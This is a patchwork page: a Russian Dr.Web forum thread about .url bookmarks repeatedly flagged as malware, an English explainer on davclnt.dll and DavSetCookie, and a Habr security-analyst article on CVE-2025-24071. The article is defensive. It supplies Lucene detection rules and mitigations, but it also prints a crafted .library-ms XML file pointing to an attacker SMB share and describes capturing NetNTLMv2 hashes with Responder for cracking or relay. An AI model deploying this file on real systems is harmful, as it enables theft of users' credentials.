#1
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 11:17
Лет 8 назад в favorites сохранил линк на посмотреть потом и так руки не дошли, сейчас Др.ВЕБ напомнил об этом линке
- Наверх
#2
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 11:25
Пока набивал эту строчку, посыпались сообщения, теперь вирусы в
Текстуры высокого разрешения. Текстуры для Photoshop. 3D текстуры. 3D объекты..url
Variables (переменные) в Photoshop.url
Ложные срабатывания? Полное сканирование делал в январе, не было ничего .
- Наверх
#3
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 13:08
Интересно, линк на сайт был добавлен за пару дней до 22 февраля, сейчас он оказался с вирусом и был удален из favorites. Я добавил линк повторно, но реакции Др.ВЕБ никакой.
- Наверх
#4
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 14:32
Сделал полное сканирование, вирусов не найдено, но спустя пару минут, найден вирус в url.
После удаления url, я создал новый, при добавлении никаких сообщений о вирусе не было, но спустя минут 20, в этом url был найден вирус.
Получается, какая-то зараза сидит у меня и вирусует url, но почему-то сканер ничего не обнаруживает или ложное срабатывание Др.ВЕБ.
- Наверх
#5
Dmitry_rus
Dmitry_rus
- Helpers
- 3 670 Сообщений:
Guru
Отправлено 25 Март 2022 — 14:35
проверить URL на vms.drweb.com — не? Что скажет?
- Наверх
#6
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 14:49
проверить URL на vms.drweb.com — не? Что скажет?
Ничего
Но спустя время, там вдруг вирус.
Я не понимаю, что происходит. Такая ситуация только у меня?
Сообщение было изменено ЛСергей: 25 Март 2022 — 14:51
- Наверх
#7
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 14:54
Для проверки сайт добавил в исключения и сохранил линк на сайт, всё сообщений нет, через пару минут SHORTCUT:MALWARE.URL.
- Наверх
#8
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 14:57
- Наверх
#9
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 15:00
Вот с через онлайн сканер на вашем сайте
- Наверх
#10
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 15:31
Скажите, не могут ли это быть происки мелкомягких? С какой-то радости вирусованными оказываются линки на сайты в домене .ру или на русском. Что плохого с сайтом liveclasses.ru, сканер не находит там ничего, но линк удаляется.
Обновления 10х64 были 9 марта, а чудеса с линками начались сегодня.
И ещё, вирусованный и удаленный линк на сайт m0nkrus’a, я добавил опять и копию отсадил на другой диск, там он живой и к нему нет претензий, длина 515 байт и не меняется.
- Наверх
#11
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 25 Март 2022 — 17:15
Dmitry_rus,
Проверка объектов в карантине
Некоторые проверенные объекты не содержат угроз. Вы хотите восстановить эти объекты?
Объект: Варез от mOnkrus’a [Warez by mOnkrus].url
Дата: Fri 25/03/2022 14:21
Но при попытке восстановить, сообщение, что восстановление невозможно, возникла ошибка в rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie
- Наверх
#12
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 26 Март 2022 — 17:28
Второй день, удаления продолжаются, проверяю в карантине, вирусов нет, восстанавливаю, но ровно через 10 минут опять удаление.
Если вирусов нет, то почему спайдер удаляет файлы?
- Наверх
#13
Dmitry_rus
Dmitry_rus
- Helpers
- 3 670 Сообщений:
Guru
Отправлено 27 Март 2022 — 09:17
возникла ошибка в rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSet
Какая именно ошибка? Если запустить
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie
из комстроки — будут ли какие-то сообщения, указывающие на ошибки?
- Наверх
#14
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 30 Март 2022 — 14:07
Какая именно ошибка? Если запустить
В CMD запускаю, ошибки нет никакой.
Проверка объектов в карантине
Некоторые проверенные объекты не содержат угроз. Вы хотите восстановить эти объекты?
Но через 10 минут опять вирус. Делал полную проверку, ничего не найдено.
- Наверх
#15
Konstantin Yudin
Konstantin Yudin
- Dr.Web Staff
- 19 568 Сообщений:
Смотрящий
Отправлено 30 Март 2022 — 14:12
я понимаю что ничего не понимаю
With best regards, Konstantin Yudin
Doctor Web, Ltd.
- Наверх
#16
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 30 Март 2022 — 15:28
я понимаю что ничего не понимаю
Аналогично.
Я понимаю, что проблема только у меня, раз больше никто не сообщил, но даже не знаю, где и что искать, если сканер молчит. Более того, если после создания url, копию этого файла копирую в другую папку и после восстановления из карантина делаю текстовое сравнение в Total Commander, то файлы полностью совпадают, разница только в дате совпадают(при восстановлении из карантина время меняется).
Допускаю, что были вирусы и потому спайдер эти файлы смувил в карантин.
Но я создаю новый url и через 10 минут эта песня начинается с начала.
Второе более непонятно. В карантине делаю проверку, вирусов нет, тогда восстанавливаю, но через 10 минут см. скриншот в #1
За последнее время были только 2 обновления.
Виндоус обновлися, см. #10
и 16 марта PaperScan 4 Professional Edition(в paperscanpro4.exe Trojan.Siggen17.23276), при скачивании Др.ВЕБ обнаружил в их ехе троян и я сразу же удалил, отчет выслал в их фирму, ответ не пришел.
18 марта я скачад этот же ехе с тем же CRC32, но вируса уже не было и установил.
А 25 марта начались вирусы в url.
Не знаю, есть ли связь с этими обновлениями.
Если создать такие же закладки в FF, то спайдер не говорит ничего.
И ещё, спайдер вирус находит только в папке с закладками, другие папки с копией ему без разницы.
Возможно, что это мелкие пакости от мелкомягких?
Сообщение было изменено ЛСергей: 30 Март 2022 — 15:31
- Наверх
#17
Alexandr_Goldenberg
Alexandr_Goldenberg
- Posters
- 14 Сообщений:
Newbie
Отправлено 05 Май 2022 — 03:16
У меня похожая ситуация. 25 марта Spider обнаружил SHORTCUT:MALWARE.URL в 10 ссылках в папке Favorites и вылечил их, т.е. просто удалил. После этого я запускал сканер на полную проверку: угроз не было обнаружено.
Вчера я перепроверил те 10 объектов в карантине, объекты оказались чистыми, и я их восстановил. Затем я запустил сканер на полную проверку, и эти 10 объектов опять выявлены как зараженные SHORTCUT:MALWARE.URL. При этом сканер в таблице с результатами проверки отметил их как измененные системные объекты.
- Наверх
#18
Alexandr_Goldenberg
Alexandr_Goldenberg
- Posters
- 14 Сообщений:
Newbie
Отправлено 06 Май 2022 — 08:45
Правда, в моем случае ссылки ведут на сайты, находящиеся в базе вредоносных сайтов Dr.Web.
Видимо, проверяются ссылки только в папке Favorites, поэтому в карантине они чистые.
- Наверх
#19
Konstantin Yudin
Konstantin Yudin
- Dr.Web Staff
- 19 568 Сообщений:
Смотрящий
Отправлено 06 Май 2022 — 13:40
в карантине рескан идет только по сигнатурам движка, а это детект из облака
и то не фолс
With best regards, Konstantin Yudin
Doctor Web, Ltd.
- Наверх
#20
ЛСергей
ЛСергей
- Posters
- 1 084 Сообщений:
Poster
Отправлено 10 Май 2022 — 21:02
Правда, в моем случае ссылки ведут на сайты, находящиеся в базе вредоносных сайтов Dr.Web.
Видимо, проверяются ссылки только в папке Favorites, поэтому в карантине они чистые.
У меня на чистые сайты и сканер не видит там вирус. Напр. сайт с svg icons. Не смог я ничего придумать, сделал страницу на своем сайте и там разместил.
В моём случае, вирус детектировался без запуска сканера, 10 минут примерно и сообщение о вирусе. В тоже время, если просто смувить из папки Favorites, то уже не вирус.
- Наверх
The file davclnt.dll is a legitimate Windows system file known as the WebDAV (Web Distributed Authoring and Versioning) Client DLL. It is an essential component of the Microsoft Windows operating system and is used to allow the system to access and work with WebDAV servers. These servers enable users to collaboratively edit and manage files on remote web servers.
Is davclnt.dll Safe to Run?
Yes, the genuine davclnt.dll file is safe to run as it is a legitimate part of Windows. However, it is important to ensure that the file is indeed the authentic version provided by Microsoft. Malicious software can sometimes disguise itself as system files such as davclnt.dll to avoid detection.
Could davclnt.dll Be a Virus or Malware?
While the authentic davclnt.dll file is not malicious, viruses or malware can use the same file name to hide their presence on a system. Malware authors often name their files after genuine system files to prevent users and security software from becoming suspicious.
Common Issues Associated with davclnt.dll
Issues with davclnt.dll can arise due to different reasons, such as a faulty application, deletion, or corruption by malicious software. These issues can be:
– Error messages stating that the davclnt.dll file is missing or corrupted.
– Problems accessing WebDAV servers or certain remote documents.
– Performance degradation of the system if the davclnt.dll is compromised by malware.
How to Fix Issues With davclnt.dll
1. Perform a System Scan: Conduct a system scan with reputable antivirus and antimalware software to ensure the file is not malicious or compromised.
2. Check the File Location: Ensure the davclnt.dll file is located in the C:\Windows\System32 directory, which is its proper location. Presence in other locations might indicate a malicious file.
3. Verify the File’s Authenticity: Check the digital signature and hashes of the file against known values to verify its authenticity.
4. Reinstall Affected Programs: If a specific program related to WebDAV is experiencing issues, reinstalling the software could rectify the file error.
5. Windows System File Checker: Run the System File Checker utility by entering `sfc /scannow` in the Command Prompt (with administrative privileges) to repair missing or corrupted system files, including davclnt.dll.
6. Check for Windows Updates: Ensure your system is up to date with the latest Windows patches and updates that could contain fixes for system file issues.
7. Restore the System: If the issue began after a recent change, using System Restore to revert the state of the system to a previous point in time might resolve the problem.
Community discussions, such as forums on Microsoft’s website, Reddit, Bleeping Computer, and other tech websites, include user experiences with davclnt.dll. Users have reported alerts from antivirus tools regarding the execution of the file, with specific concern about rundll32.exe being used to run davclnt.dll with the “DavSetCookie” argument. These behaviors can be flagged by systems like VoodooShield or Cyberlock due to potential malicious activity. However, community feedback suggests that in some cases, these flags may be false positives, especially following a clean installation of Windows and if no malicious activity is detected after thorough scans with multiple security tools.
A particular case on Reddit indicates concerns when davclnt.dll is used during a Malwarebytes scan. The discussion led to advice on whitelisting Malwarebytes within the security software and considerations of coincidental timing with the execution of scripts.
For detailed community discussions, users can search relevant topics on forums such as answers.microsoft.com, Reddit, and bleepingcomputer.com regarding davclnt.dll and its safe operation.
Understanding how to differentiate between legitimate system processes and malware is crucial for users to maintain the security and functionality of their systems. While rundll32.exe and davclnt.dll are both legitimate components of Windows, their misuse by malware should be a concern for users vigilant about their cybersecurity.
It’s essential to take a detailed look at processes and file behaviors to ensure they are functioning as intended and not compromised. The questions surrounding davclnt.dll highlight the importance of staying informed and prepared to take appropriate steps when potential security threats are identified.
Give us some love and rate our post!
Уровень сложностиСредний
Время на прочтение7 мин
Количество просмотров4.2K
Привет, Хабр! Меня зовут Илья Ефимов, я ведущий аналитик SOC компании BI.ZONE. В этой статье поговорим о нашумевшей CVE-2025-24071, которая позволяет атакующим получить NetNTLMv2-хеш-суммы паролей в результате некорректной обработки файлов .library-ms
в Windows Explorer. Сама уязвимость уже эксплуатируется in-the-wild, о чем свидетельствуют данные, полученные от исследователей в области кибербезопасности. В своем небольшом исследовании я покажу, за счет чего происходит эксплуатация уязвимости, примеры событий, а также расскажу, как обнаружить такую активность.
Что такое .library-ms-файл
Начнем с того, что собой представляет файл .library-ms
. Исходя из документации Microsoft, .library-ms
-файлы — это XML-файлы, которые определяют библиотеки Windows (Windows Libraries) — специальные виртуальные коллекции папок и файлов, представленные в проводнике.
Файлы с расширением .library-ms
— это XML-файлы, которые:
-
Хранят настройки библиотек Windows (например, «Документы», «Изображения», «Музыка»).
-
Содержат ссылки на расположения (папки, диски, сетевые ресурсы), объединенные в одну логическую группу.
-
Используют схему XML, описанную в Library Schema (MSDN), для определения структуры и свойств библиотеки.
-
Могут быть созданы или изменены пользователем для настройки библиотек под свои нужды. Основные теги в
.library-ms
-файле:-
<library>
— корневой элемент, содержит описание библиотеки. -
<name>
— отображаемое имя библиотеки. -
<version>
— версия схемы библиотеки. -
<isLibraryPinned>
— указывает, закреплена ли библиотека в панели навигации. -
<iconReference>
— путь к иконке библиотеки. -
<templateInfo>
— определяет тип контента (например, «Документы», «Музыка»). -
<searchConnectorDescription>
— содержит параметры поиска. -
<simpleLocation>
/<url>
— пути к включенным папкам.
-
Последний параметр крайне важен, так как он позволяет указывать адреса удаленных ресурсов (например, С2-сервер злоумышленника).
Пример структуры .library-ms
-файла:
<?xml version="1.0" encoding="UTF-8"?>
<library xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>My Documents</name>
<version>1.0</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1002</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>true</isSupported>
<simpleLocation>
<url>%USERPROFILE%\Documents</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</library>
Суть уязвимости
На самом деле, еще два года назад в статье рассматривались атаки на пользователей с использованием .library-ms
-файлов. Там было описано, как за счет указания управляющего сервера злоумышленника в <url>
-теге файла можно осуществлять удаленное исполнение кода за счет взаимодействия с WebDAV-шарой атакующего.
18 марта 2025 года исследователь 0x6rss в своем блоге раскрыл детали уязвимости, где описал, что при распаковке файла из RAR-/ZIP-архива Windows Explorer из-за доверия к файлам .library-ms
автоматически анализирует их. Если в теге <url>
указана ссылка на SMB-шару атакующего, то происходит автоматическая попытка NTLM-аутентификации с вытекающей из этого кражей NetNTLMv2-хешей учетной записи жертвы. Как было замечено исследователями, уязвимость также эксплуатируется при обычном сохранении вложения письма в файловую систему. Также было выявлено, что аутентификация на удаленной SMB-шаре будет необходима при любой работе с файлом .library-ms
, включая его создание, удаление или перемещение по диску.
Интересный момент: для одного и того же .library-ms
-файла при повторной распаковке эксплуатации уязвимости не возникает. Вероятнее всего, это связано с тем, что Windows Explorer считывает содержимое только новых файлов, которые незнакомы системе.
Эксплуатация уязвимости
Для генерации файла воспользуемся PoC от исследователя 0x6rss.
В результате получаем ZIP-архив, в котором содержится файл .library-ms
.
Пример содержимого такого файла. Прежде всего обращаем внимание на теги <url>
и <simpleLocation>
, где указывается наш сервер, принимающий попытки NTLM-аутентификации. Стоит отметить, что существование shared
или любого другого файла на удаленном ресурсе необязательно, достаточно инициализировать исходящее SMB-подключение хоста:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.3.132.57\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
На видео ниже воспроизведение активности — извлечение вредоносного файла из архива и попытка NetNTLMv2-аутентификации по протоколу SMB с управляющим сервером.
Как показано на видео, для эксплуатации уязвимости жертве достаточно распаковать архив с вредоносным файлом и система далее все сделает сама.
На скрине ниже можно увидеть результат работы Responder, где нам удалось получить хеш-сумму NetNTLMv2 учетной записи жертвы, которую впоследствии можно будет перебрать локально или использовать, к примеру, в Relay-атаках.
Генерируемые события
С помощью Procmon можно наблюдать, что Explorer.exe
и службами индексации, такими как SearchProtocolHost.exe
, сразу после извлечения файла .library-ms
выполняются следующие операции автоматически:
-
CreateFile
— файл открывается Explorer. -
ReadFile
— содержимое файла читается для извлечения метаданных. -
QueryBasicInformationFile
— выполняются запросы метаданных. -
QueryStandardInformationFile
— выполняются запросы стандартной информации о файле. -
CloseFile
— файл закрывается после обработки.
Кроме того, SearchProtocolHost.exe
вызывается в рамках службы индексации файлов Windows. После того как Explorer.exe
завершает свою начальную обработку, служба индексации снова открывает и читает файл для индексации его содержимого. Это дополнительно подтверждает автоматическую обработку файлов при извлечении.
Далее, после обработки SearchProtocolHost.exe
, можно увидеть начинающееся соединение с управляющим сервером.
Эти действия однозначно демонстрируют, что Windows автоматически обрабатывает файлы сразу после извлечения, без какого-либо явного взаимодействия пользователя. Как Explorer.exe
, так и SearchProtocolHost.exe
автоматически читают и обрабатывают XML-содержимое файла .library-ms
, инициируя попытку подключения к встроенному SMB-пути.
Если говорить о событиях ОС Windows, которые генерируются в результате активности, то можно выделить следующие:
Обратите внимание! Ниже будут представлены правила, написанные на языке Lucene и использующие BI.ZONE Data Model.
1. При распаковке файла получаем событие создания файла с расширением .library-ms
.
Здесь хочется отметить, что в поле proc_file_path
проставляется исполняемый файл, в результате работы которого было распаковано содержимое архива. Так как в нашем случае это Windows Explorer, то можно прийти к выводу, что, если в системе жертвы нет ни одного архиватора, распаковать архив попытается процесс explorer.exe
.
Правило, по которому можно детектировать подобную активность, выглядит следующим образом:
dev_os_type:"windows" AND
event_type:(FileCreate OR FileCreateWin OR FileInfo OR FileInfoWin) AND file_name.keyword:/.*\.library-ms
2. При непосредственном взаимодействии с управляющим сервером после распаковки файла возникают события:
-
создания процесса
c:\windows\system32\rundll32.exe
, который, в свою очередь, вызывает функциюDavSetCookie
из библиотекиC:\Windows\system32\davclnt.dll
. Документацию по функции найти не удалось, предположительно она используется для установки cookie для WebDAV-сессии. Отмечаем, что в аргументах данной функции принимается IP-адрес / доменное имя удаленного ресурса, а также полный путь с учетом директории; -
соединения (
pipecreate
) с именованным каналом\\.\pipe\dav rpc service
с аналогичной командной строкой.
Правило, по которому можно детектировать подобную активность, выглядит следующим образом:
dev_os_type:"windows" AND
(
(
event_type:(ProcessCreate OR ProcessCreateWin OR ProcessInfo OR ProcessInfoWin) AND
proc_file_path:"\\windows\\system32\\rundll32.exe" AND
cmdline:("\\Windows\\system32\\davclnt.dll,DavSetCookie")
) OR
(
event_type:pipeconnect AND
proc_file_path:"\\windows\\system32\\rundll32.exe" AND
proc_cmdline:("\\Windows\\system32\\davclnt.dll,DavSetCookie") AND
pipe_path:"\\\\.\\pipe\\dav rpc service"
)
)
Вывод
В данной статье я продемонстрировал суть уязвимости CVE-2025-24071, процесс эксплуатации, генерируемые при активности события, а также предложения по детектированию. Хочу отметить, что, хотя, по версии Microsoft, уязвимость не будет популярна в публичной эксплуатации, она может быть крайне популярна в фишинговых кампаниях из-за широкой применимости в новейших ОС, а также из-за простоты эксплуатации.
Мониторинг описанной выше активности за счет предложенных правил детектирования позволит выявить попытки эксплуатации уязвимости. Другие рекомендации:
-
Ограничить исходящие SMB-соединения с внешними серверами для предотвращения потенциальных атак.
-
Как дополнительную меру также можно предложить добавить политику
"Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers"
на значениеDeny All
(при необходимости можно добавить исключения). -
Обновить операционную систему Windows до последней версии, включая мартовские обновления, для устранения известных уязвимостей.
-
Запретить запуск файлов с расширением
.library-ms
, так как они могут быть использованы для эксплуатации уязвимостей. -
Блокировать получение файлов с расширением
.library-ms
по электронной почте, чтобы предотвратить распространение вредоносных объектов.
Provide feedback
Saved searches
Use saved searches to filter your results more quickly
Sign up
Appearance settings